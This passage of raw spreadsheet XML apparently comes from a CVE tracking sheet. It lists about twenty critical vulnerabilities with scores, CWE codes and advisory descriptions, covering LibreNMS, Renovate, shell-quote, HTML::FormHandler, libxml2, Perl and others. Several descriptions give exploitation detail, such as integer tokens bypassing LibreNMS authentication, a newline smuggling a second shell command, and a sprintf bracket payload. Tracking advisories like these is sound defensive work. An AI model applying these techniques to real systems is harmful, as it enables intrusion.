      <c r="I594" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L594" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.8.0 contains an authentication bypass vulnerability in the REST API that allows unauthenticated attackers to access protected endpoints by sending numeric values instead of string tokens. Attackers can exploit MySQL type coercion by sending small integers like 0 through 9 to match token hashes, gaining access to API functionality including device credentials and administrative features that enable remote code execution through alert templates.</t>
        </is>
      </c>
      <c r="M594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86426</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87930</t>
        </is>
      </c>
      <c r="C595" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D595" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L595" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 passes the ci_session cookie to unserialize() without class restrictions, allowing unauthenticated attackers to inject PHP objects. Attackers can forge valid session cookies using the hardcoded encryption key to trigger magic methods and corrupt application state or achieve code execution if gadget classes exist.</t>
        </is>
      </c>
      <c r="M595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87930</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88880</t>
        </is>
      </c>
      <c r="C596" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D596" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="inlineStr"/>
      <c r="G596" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L596" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.11.3 fails to validate Link header destinations when following GitLab server pagination, allowing malicious servers to redirect credential-bearing requests. Attackers controlling a compromised GitLab server can specify a Link header pointing to attacker-controlled infrastructure to exfiltrate authentication credentials.</t>
        </is>
      </c>
      <c r="M596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88880</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88881</t>
        </is>
      </c>
      <c r="C597" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D597" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="inlineStr"/>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="inlineStr"/>
      <c r="I597" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L597" s="5" t="inlineStr">
        <is>
          <t>Renovate, a dependency update tool, follows pagination links supplied by the GitHub server in the HTTP `Link` header when interacting with GitHub.com, GitHub Enterprise Cloud, or GitHub Enterprise Server, and sends the credentials configured for that host to the URL given as the 'next' page. Because the pagination URL is not validated against the host originally contacted, a malicious or compromised GitHub server can return a `Link` header pointing to an attacker-controlled host and cause Renovate to disclose those credentials to it. Exploitation requires that the GitHub server Renovate talks to (as the repository host or as a datasource such as github-releases, github-tags, or git-refs) is already malicious or compromised. The issue is fixed in renovate 44.11.3 (npm and renovate/renovate container images), Mend Renovate CE/EE images and the mend-renovate-ce helm chart 15.4.0, and the mend-renovate-enterprise-edition helm chart 10.4.0. There is no workaround; the pre-existing RENOVATE_X_REBASE_PAGINATION_LINKS option disables the new host check and should only be used with servers that intentionally use different pagination hosts.</t>
        </is>
      </c>
      <c r="M597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88881</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88882</t>
        </is>
      </c>
      <c r="C598" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D598" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="inlineStr"/>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="inlineStr"/>
      <c r="I598" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L598" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. In versions before 44.11.2 (and Mend Renovate CE/EE images and charts before 15.4.0, and mend-renovate-enterprise-edition helm chart before 10.4.0), when listing new package versions from a NuGet registry Renovate follows pagination URLs supplied by the registry in the HTTP `Link` header without verifying that the target has the same origin as the configured registry. Registry credentials are attached to the request for the 'next' page, so a malicious or compromised NuGet registry can return a `Link` header pointing at an attacker-controlled server and cause Renovate to send the registry credentials to that server. Exploitation requires the remote registry to be malicious or compromised; such a registry would normally already have received the credentials on the initial request, so the issue primarily allows the credentials to be delivered to an additional, attacker-chosen host. The fix restricts pagination to the same origin; the previous behaviour can be re-enabled with the RENOVATE_X_NUGET_PAGINATION_ALLOW_CROSS_ORIGIN option.</t>
        </is>
      </c>
      <c r="M598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88882</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88887</t>
        </is>
      </c>
      <c r="C599" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D599" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="inlineStr"/>
      <c r="G599" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L599" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. When listing tags/digests for a container image, Renovate follows pagination links supplied by the remote registry in the HTTP Link header and attaches the registry credentials to the follow-up request without verifying that the pagination URL has the same origin as the original registry. A malicious or compromised container registry can therefore specify a Link header pointing to an attacker-controlled host and receive the credentials Renovate uses for that registry. Exploitation requires that the target has container (Docker) dependencies and is already interacting with the malicious or compromised registry. This is fixed in Renovate 44.11.2 (npm and renovate/renovate images), Mend Renovate CE/EE 15.4.0 and the mend-renovate-enterprise-edition Helm chart 10.4.0; the same-origin check can be disabled with RENOVATE_X_DOCKER_PAGINATION_ALLOW_CROSS_ORIGIN.</t>
        </is>
      </c>
      <c r="M599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88887</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89243</t>
        </is>
      </c>
      <c r="C600" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D600" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="inlineStr"/>
      <c r="G600" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L600" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in UserGroups::setGroup_name() that fails to sanitize group_name input. Administrators with canAdminUserGroups permission can inject malicious HTML and JavaScript that executes in the browser when other administrators access the user manager interface.</t>
        </is>
      </c>
      <c r="M600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89243</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9277</t>
        </is>
      </c>
      <c r="C601" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D601" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G601" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L601" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (\n, \r, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: '...\n...' }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser's control-operator allowlist; `{ op: 'glob', pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`.</t>
        </is>
      </c>
      <c r="M601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9277</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9317</t>
        </is>
      </c>
      <c r="C602" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D602" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G602" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L602" s="5" t="inlineStr">
        <is>
          <t>Nango before 0.71.6 contains a missing authentication vulnerability in the runner tRPC server that allows unauthenticated attackers to execute arbitrary JavaScript code by invoking the exposed start procedure without credentials. Attackers with network access to the runner port can send requests to the unauthenticated start procedure, bypassing the unenforced RUNNER_SECRET_KEY environment variable, to achieve remote code execution within the runner process.</t>
        </is>
      </c>
      <c r="M602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9317</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-4993</t>
        </is>
      </c>
      <c r="C603" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D603" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-470</t>
        </is>
      </c>
      <c r="L603" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410000 for Perl allow attacker selected method dispatch and resource exhaustion because _apply_actions and add_error use error message text built from request data as a Locale::Maketext bracket notation template.
add_error hands its first argument to the language handle as the Locale::Maketext message key, and the default handle's lexicon sets `_AUTO`, so a string that is not a lexicon entry is compiled as a bracket notation template instead of being looked up. In a bracket group the first token names a method called on the language handle and the remaining tokens are its arguments.
Three kinds of text the library did not author reach that position. _apply_actions installs a `$SIG{__WARN__}` handler that stores the warning text in `$error_message`, and a captured warning survives a successful action, so a field carrying a numeric transform turns `Argument "[sprintf,%50000000d,0]" isn't numeric` into the template; a warning quotes the submitted value verbatim, so the group is well formed and dispatches. `$error_message ||= $tobj-&gt;validate($new_value)` takes a type constraint's own failure message, which renders the rejected value through a partial dumper in bracket and comma form (Devel::PartialDump when Moose can load it, Type::Tiny's own dumper always), so a field with `apply =&gt; [ Str ]` given a parameter sent more than once, which arrives as an array, gets `Reference ["a","b"] did not pass type constraint "Str"` as its template, from a request that carries no bracket character of its own. A coercion or transform exception reaches it the same way. Beyond those, a validator whose message contains the field value puts that value in the template directly, and add_error replaces the message list with the contents of an arrayref first argument (`@message = @{$message[0]} if ref $message[0] eq 'ARRAY'`), so a value arriving as an array fills the argument slots from the same request as well.
A malformed group such as `[0]` makes the compile croak, and HTML::FormHandler::I18N::maketext and add_error each re-raise that as a die, so process() throws. A well formed group naming sprintf reaches CORE::sprintf with an attacker chosen field width. Any caller that applies a type constraint or a transform to an untrusted field, or whose validator passes an untrusted field value to add_error, can be made to throw an unhandled exception out of process(), or to allocate an arbitrary amount of memory in one request, and an application whose language handle subclass defines side effecting public methods makes those callable with attacker chosen arguments. The dumped type constraint message is bounded to the exception, because both dumpers quote non-numeric elements so the method slot is never an attacker chosen name. The built-in messages pass fixed templates with the value in an argument slot, where it stays inert, and the built-in field types attach explicit message callbacks, so neither is affected.</t>
        </is>
      </c>
      <c r="M603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-4993</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-49794</t>
        </is>
      </c>
      <c r="C604" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D604" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr">
        <is>
          <t>2025-06-16</t>
        </is>
      </c>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="L604" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the &lt;sch:name path="..."/&gt; schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.</t>
        </is>
      </c>
      <c r="M604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-49794</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-49796</t>
        </is>
      </c>
      <c r="C605" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D605" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr">
        <is>
          <t>2025-06-16</t>
        </is>
      </c>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L605" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.</t>
        </is>
      </c>
      <c r="M605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-49796</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51679</t>
        </is>
      </c>
      <c r="C606" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D606" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="inlineStr"/>
      <c r="I606" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr">
        <is>
          <t>CWE-1281</t>
        </is>
      </c>
      <c r="L606" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. A mismatch between the RTL and netlist can lead to unexpected behavior.</t>
        </is>
      </c>
      <c r="M606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51679</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70146</t>
        </is>
      </c>
      <c r="C607" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D607" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="inlineStr">
        <is>
          <t>projectworlds:online_time_table_generator</t>
        </is>
      </c>
      <c r="I607" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L607" s="5" t="inlineStr">
        <is>
          <t>Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.</t>
        </is>
      </c>
      <c r="M607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70146</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10059</t>
        </is>
      </c>
      <c r="C608" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D608" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G608" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L608" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Multicluster Engine for Kubernetes ClusterCurator controller. A tenant administrator with namespace-scoped privileges can exploit this vulnerability by creating a namespaced ClusterCurator. This action inadvertently grants the tenant administrator the ability to mint a token for a ServiceAccount with cluster-wide administrative authority. This leads to a privilege escalation, allowing the tenant administrator to gain full control over the cluster.</t>
        </is>
      </c>
      <c r="M608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10059</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13221</t>
        </is>
      </c>
      <c r="C609" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D609" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="inlineStr">
        <is>
          <t>perl:perl</t>
        </is>
      </c>
      <c r="I609" s="5" t="inlineStr">
        <is>
          <t>2026-07-13</t>
        </is>
      </c>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L609" s="5" t="inlineStr">
        <is>
          <t>Perl versions before 5.40.5-RC1, from 5.41.0 before 5.42.3-RC1, from 5.43.0 before 5.43.10 produce silently incorrect regular expression matches when an alternation of more than 65535 fixed string branches is compiled into a trie in Perl_study_chunk.
When such branches are combined into a trie, the delta between the first branch and the shared tail is stored in a 16-bit field. A branch count above 65535 overflows the field, and the trie's match decision table is truncated with no warning or error.
A pattern of this shape produces false positive matches (matching strings it should not) and false negative matches (failing to match strings it should). When such a pattern gates an access or filtering decision, the result is wrong.</t>
        </is>
      </c>
      <c r="M609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13221</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16272</t>
        </is>
      </c>
      <c r="C610" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D610" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="L610" s="5" t="inlineStr">
        <is>
          <t>Use of less trusted source vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Exploitation of Trusted Identifiers.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="M610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16503</t>
        </is>
      </c>
      <c r="C611" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D611" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G611" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql</t>
        </is>
      </c>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1327, CWE-1393</t>
        </is>
      </c>
      <c r="L611" s="5" t="inlineStr">
        <is>
          <t>Deployment of the VPS.org one-click Supabase template deploys a PostgreSQL instance that is published on all interfaces (0.0.0.0:5432) with a default database password set to "postgres". Because Docker installs its own iptables rules, this exposure bypasses a standard host UFW configuration.</t>
        </is>
      </c>
      <c r="M611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16503</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17057</t>
        </is>
      </c>
      <c r="C612" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D612" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G612" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H612" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I612" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L612" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and affect data integrity due to missing authentication for critical functions.</t>
        </is>
      </c>
      <c r="M612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17057</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17207</t>
        </is>
      </c>
      <c r="C613" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D613" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G613" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H613" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I613" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L613" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and compromise integrity due to a buffer overflow.</t>
        </is>
      </c>
      <c r="M613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
